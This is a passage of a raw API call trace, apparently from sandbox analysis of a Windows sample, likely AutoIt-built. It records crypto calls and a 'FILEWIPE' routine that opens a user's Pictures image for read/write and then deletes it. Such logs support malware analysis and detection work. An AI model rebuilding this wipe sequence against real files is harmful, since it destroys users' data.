out: lpMsg=0x87f04c) returned 0 [0190.886] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.886] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.886] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.886] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.886] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.886] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.887] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.887] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.887] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.891] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.895] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.895] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0190.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x8e2aef50, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 0x90af58 [0190.895] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0190.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.895] CharLowerBuffW (in: lpsz="byte[11460]", cchLength=0xb | out: lpsz="byte[11460]") returned 0xb [0190.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.896] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.896] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.896] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.896] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0190.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.897] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.897] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.898] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.898] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\tim2ia.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0190.899] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.900] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.900] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.900] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.900] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.900] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.901] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.901] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.901] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.901] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpFilePart=0x0) returned 0x42 [0190.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x17000c80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 0x90af58 [0190.901] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\tim2ia.jpg")) returned 1 [0190.903] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b46d40, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x8e2aef50, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x17000c80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2cc4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="tiM2iA.jpg", cAlternateFileName="")) returned 0 [0190.903] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.904] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.904] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.905] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.905] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.906] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.906] PeekMessageW 